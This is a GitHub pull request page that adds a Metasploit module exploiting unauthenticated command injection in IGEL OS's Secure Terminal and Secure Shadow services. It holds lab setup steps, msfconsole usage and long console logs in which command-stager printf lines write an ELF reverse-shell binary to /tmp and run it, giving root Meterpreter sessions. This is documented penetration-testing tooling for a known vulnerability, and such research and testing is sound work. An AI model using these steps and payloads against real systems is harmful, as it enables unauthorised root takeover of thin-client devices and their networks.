Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module IGEL OS Remote Command Execution #14947

Merged
merged 10 commits into from Apr 30, 2021
Merged

Add module IGEL OS Remote Command Execution #14947

merged 10 commits into from Apr 30, 2021

Conversation

robvinson
Copy link
Contributor

Vulnerable Application

IGEL OS before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a system() call via Secure Terminal and Secure Shadow services.

This module uses the vulnerability to modify certain systemd limits for the targeted service before transfering the payload; this is done to increase payload transfer throughput and preserve service stability. After exploitation these changes are reverted.

Secure Terminal/telnet_ssl_connector: 30022/tcp
Secure Shadow/vnc_ssl_connector: 5900/tcp

Verification Steps

Download Vulnerable IGEL OS version (e.g. 11.04.130) from: https://www.igel.com/software-downloads/workspace-edition/.

Unpack downloaded zip file and create a VM using the included .iso.

Navigate through the installation menus to install the firmware, reboot when prompted

After rebooted work through the presented configuration wizard. In the Activation section use the starter license (selected by default). Skip the ICG Agent Setup. Upon completion the system will reboot again.

Turn on vulnerable services

  1. Click on the launcher menu
  2. Click on the gear icon
  3. Select "Setup" from the Application menu to launch the Setup app
  4. To enable vulnerable VNC service wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Shadow. Ensure "Allow remote shadowing" and "Secure mode" are checked.
  5. To enable vulnerable terminal wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Secure Terminal. Ensure "Secure Terminal" is checked.

Exploitation

  1. start msfconsole
  2. use exploit/linux/misc/igel_command_injection
  3. set RHOST [TARGET IP]
  4. set RPORT [30022 or 5900]
  5. set LHOST [LOCAL IP]
  6. exploit

Misc

To obtain the IGEL's IP address to test against click the up/down arrows on the right side of the task bar then click "More Details". A shell is available on a virtual console by ctrl+alt+F11, switch back to the GUI with ctrl+alt+F1.

This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500 with metasploit framework 6.0.31-dev on Kali.

Scenarios

IGEL OS 11.04.130

Targeting the Secure Terminal service (30022/tcp):

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.224
RHOST => 192.168.120.224
msf6 exploit(linux/misc/igel_command_injection) > check
[*] 192.168.120.224:30022 - The target appears to be vulnerable.
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.service StartLimitBurst
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.224:30022 - Writing payload to file /tmp/CPr9.
[*] 192.168.120.224:30022 - Executing payload /tmp/CPr9.
[*] 192.168.120.224:30022 - Removing payload file /tmp/CPr9.
[*] Sending stage (39324 bytes) to 192.168.120.224
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.224:48130) at 2021-03-25 12:29:45 -0400
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.service
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.socket

meterpreter > getuid
Server username: root
meterpreter >

IGEL OS 10.05.500

Targeting the Secure Shadowing service (5900/tcp):

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.226
RHOST => 192.168.120.226
msf6 exploit(linux/misc/igel_command_injection) > set RPORT 5900
RPORT => 5900
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.service StartLimitBurst
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.226:5900 - Writing payload to file /tmp/lSmU.
[*] 192.168.120.226:5900 - Executing payload /tmp/lSmU.
[*] 192.168.120.226:5900 - Removing payload file /tmp/lSmU.
[*] Sending stage (39328 bytes) to 192.168.120.226
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.service
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.socket
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.226:55144) at 2021-03-25 12:48:34 -0400

meterpreter > getuid
Server username: root
meterpreter >

@gwillcox-r7 gwillcox-r7 added module needs-linting The module needs additional work to pass our automated linting rules labels Mar 25, 2021
@label-actions
Copy link

label-actions bot commented Mar 25, 2021

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@gwillcox-r7
Copy link
Contributor

Please also run tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/misc/igel_command_injection.md and fix as many of the errors reported as possible (don't worry about any line length errors if its a link though).

@bcoles bcoles removed the needs-linting The module needs additional work to pass our automated linting rules label Mar 25, 2021
@space-r7 space-r7 self-assigned this Apr 1, 2021
space-r7
space-r7 reviewed Apr 2, 2021
View reviewed changes
Copy link
Contributor

@space-r7 space-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hi, thank you for the module! I left a few comments, mostly related to stylistic changes and leveraging some of Framework's mixins. Please let me know if you have any questions. Thanks!

modules/exploits/linux/misc/igel_command_injection.rb Outdated Show resolved Hide resolved
modules/exploits/linux/misc/igel_command_injection.rb Outdated Show resolved Hide resolved
modules/exploits/linux/misc/igel_command_injection.rb Outdated Show resolved Hide resolved
modules/exploits/linux/misc/igel_command_injection.rb Outdated Show resolved Hide resolved
modules/exploits/linux/misc/igel_command_injection.rb Show resolved Hide resolved
modules/exploits/linux/misc/igel_command_injection.rb Outdated Show resolved Hide resolved
modules/exploits/linux/misc/igel_command_injection.rb Outdated Show resolved Hide resolved
robvinson and others added 6 commits April 9, 2021 09:16
@robvinson @space-r7
move privileged from false to true
c913762 
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@robvinson @space-r7
style change using unless instead of if not
85176f4 
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@robvinson
adding comment header
ffcec1f
@robvinson
using Rex::Version over more manual process
3ecd97f
@robvinson
leveraging Udp mixin for version check
1ba22f9
@robvinson
switching to CmdStager
41fe164 
- had to switch away from python payload to appease CmdStager
- removed systemd service adjustments preferring to use sleep to avoid rate limits
- updated check function to accomodate more current vulnerable version information in vendor advisory
@robvinson robvinson mentioned this pull request Apr 30, 2021
Open
@space-r7
Copy link
Contributor

Retested and the changes worked great. Thanks so much!

msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set rhost 192.168.37.133
rhost => 192.168.37.133
msf6 exploit(linux/misc/igel_command_injection) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/misc/igel_command_injection) > set verbose true
verbose => true
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] 192.168.37.133:30022 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.37.133:30022 - IGEL OS Version: 11.04.130.01
[+] 192.168.37.133:30022 - The target appears to be vulnerable.
[*] 192.168.37.133:30022 - Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0'>>/tmp/oNwdw", "printf '\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\355\\0\\0\\0\\206\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\152\\2\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\2'>>/tmp/oNwdw", "printf '\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150'>>/tmp/oNwdw", "printf '\\300\\250\\45\\1\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152'>>/tmp/oNwdw", "printf '\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300'>>/tmp/oNwdw", "printf '\\170\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/oNwdw", "chmod +x /tmp/oNwdw", "/tmp/oNwdw", "rm -f /tmp/oNwdw"]
[*] 192.168.37.133:30022 - executing: printf '\177\105\114\106\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\124\200\4\10\64\0\0\0\0\0\0\0\0\0\0\0\64\0\40\0\1\0\0\0\0\0\0\0\1\0\0\0'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  16.45% done (149/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\0\0\0\0\0\200\4\10\0\200\4\10\355\0\0\0\206\1\0\0\7\0\0\0\0\20\0\0\152\2\130\315\200\205\300\164\6\61\300\260\1\315\200\152\2'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  32.67% done (296/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\130\315\200\205\300\164\6\61\300\260\1\315\200\152\12\136\61\333\367\343\123\103\123\152\2\260\146\211\341\315\200\227\133\150'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  49.01% done (444/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\300\250\45\1\150\2\0\21\134\211\341\152\146\130\120\121\127\211\341\103\315\200\205\300\171\31\116\164\75\150\242\0\0\0\130\152'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  65.45% done (593/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\0\152\5\211\343\61\311\315\200\205\300\171\275\353\47\262\7\271\0\20\0\0\211\343\301\353\14\301\343\14\260\175\315\200\205\300'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  81.79% done (741/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\170\20\133\211\341\231\262\152\260\3\315\200\205\300\170\2\377\341\270\1\0\0\0\273\1\0\0\0\315\200'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  95.03% done (861/906 bytes)
[*] 192.168.37.133:30022 - executing: chmod +x /tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  97.13% done (880/906 bytes)
[*] 192.168.37.133:30022 - executing: /tmp/oNwdw
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 192.168.37.133
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.133:50500) at 2021-04-30 15:33:12 -0500
[*] 192.168.37.133:30022 - Command Stager progress -  98.23% done (890/906 bytes)
[*] 192.168.37.133:30022 - executing: rm -f /tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress - 100.00% done (906/906 bytes)

meterpreter > getuid
Server username: root @ ITC000C29EB2C06 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : ITC000C29EB2C06.LOCALDOMAIN
OS           : IGEL V11 (Linux 5.4.48)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.133 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/misc/igel_command_injection) > edit
msf6 exploit(linux/misc/igel_command_injection) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Secure Terminal Service
   1   Secure Shadow Service


msf6 exploit(linux/misc/igel_command_injection) > set target 1
target => 1
msf6 exploit(linux/misc/igel_command_injection) > options

Module options (exploit/linux/misc/igel_command_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.37.133   yes       The target host(s), range CIDR identifier, or hosts file with synt
                                       ax 'file:<path>'
   RPORT    5900             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                       address on the local machine or 0.0.0.0 to listen on all addresses
                                       .
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Secure Shadow Service


msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] 192.168.37.133:5900 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.37.133:5900 - IGEL OS Version: 11.04.130.01
[+] 192.168.37.133:5900 - The target appears to be vulnerable.
[*] 192.168.37.133:5900 - Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0'>>/tmp/SVRVj", "printf '\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\355\\0\\0\\0\\206\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\152\\2\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\2'>>/tmp/SVRVj", "printf '\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150'>>/tmp/SVRVj", "printf '\\300\\250\\45\\1\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152'>>/tmp/SVRVj", "printf '\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300'>>/tmp/SVRVj", "printf '\\170\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/SVRVj", "chmod +x /tmp/SVRVj", "/tmp/SVRVj", "rm -f /tmp/SVRVj"]
[*] 192.168.37.133:5900 - executing: printf '\177\105\114\106\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\124\200\4\10\64\0\0\0\0\0\0\0\0\0\0\0\64\0\40\0\1\0\0\0\0\0\0\0\1\0\0\0'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  16.45% done (149/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\0\0\0\0\0\200\4\10\0\200\4\10\355\0\0\0\206\1\0\0\7\0\0\0\0\20\0\0\152\2\130\315\200\205\300\164\6\61\300\260\1\315\200\152\2'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  32.67% done (296/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\130\315\200\205\300\164\6\61\300\260\1\315\200\152\12\136\61\333\367\343\123\103\123\152\2\260\146\211\341\315\200\227\133\150'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  49.01% done (444/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\300\250\45\1\150\2\0\21\134\211\341\152\146\130\120\121\127\211\341\103\315\200\205\300\171\31\116\164\75\150\242\0\0\0\130\152'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  65.45% done (593/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\0\152\5\211\343\61\311\315\200\205\300\171\275\353\47\262\7\271\0\20\0\0\211\343\301\353\14\301\343\14\260\175\315\200\205\300'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  81.79% done (741/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\170\20\133\211\341\231\262\152\260\3\315\200\205\300\170\2\377\341\270\1\0\0\0\273\1\0\0\0\315\200'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  95.03% done (861/906 bytes)
[*] 192.168.37.133:5900 - executing: chmod +x /tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  97.13% done (880/906 bytes)
[*] 192.168.37.133:5900 - executing: /tmp/SVRVj
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 192.168.37.133
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.133:50502) at 2021-04-30 15:34:22 -0500
[*] 192.168.37.133:5900 - Command Stager progress -  98.23% done (890/906 bytes)
[*] 192.168.37.133:5900 - executing: rm -f /tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress - 100.00% done (906/906 bytes)

meterpreter > getuid
Server username: root @ ITC000C29EB2C06 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : ITC000C29EB2C06.LOCALDOMAIN
OS           : IGEL V11 (Linux 5.4.48)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

I went ahead and added the AutoCheck mixin to the module and updated the docs with the new module output.

space-r7 added a commit that referenced this pull request Apr 30, 2021
@space-r7
Land #14947, add IGEL OS RCE
0535489
@space-r7 space-r7 merged commit 41fe164 into rapid7:master Apr 30, 2021
@space-r7
Copy link
Contributor

space-r7 commented Apr 30, 2021
edited by pbarry-r7

Release Notes

New module exploits/linux/misc/igel_command_injection exploits an unauthenticated command injection vulnerability in the Secure Terminal and Secure Shadow services in various versions of IGEL OS.

@space-r7 space-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 30, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@space-r7 space-r7 space-r7 left review comments

Assignees

@space-r7 space-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@robvinson @gwillcox-r7 @space-r7 @bcoles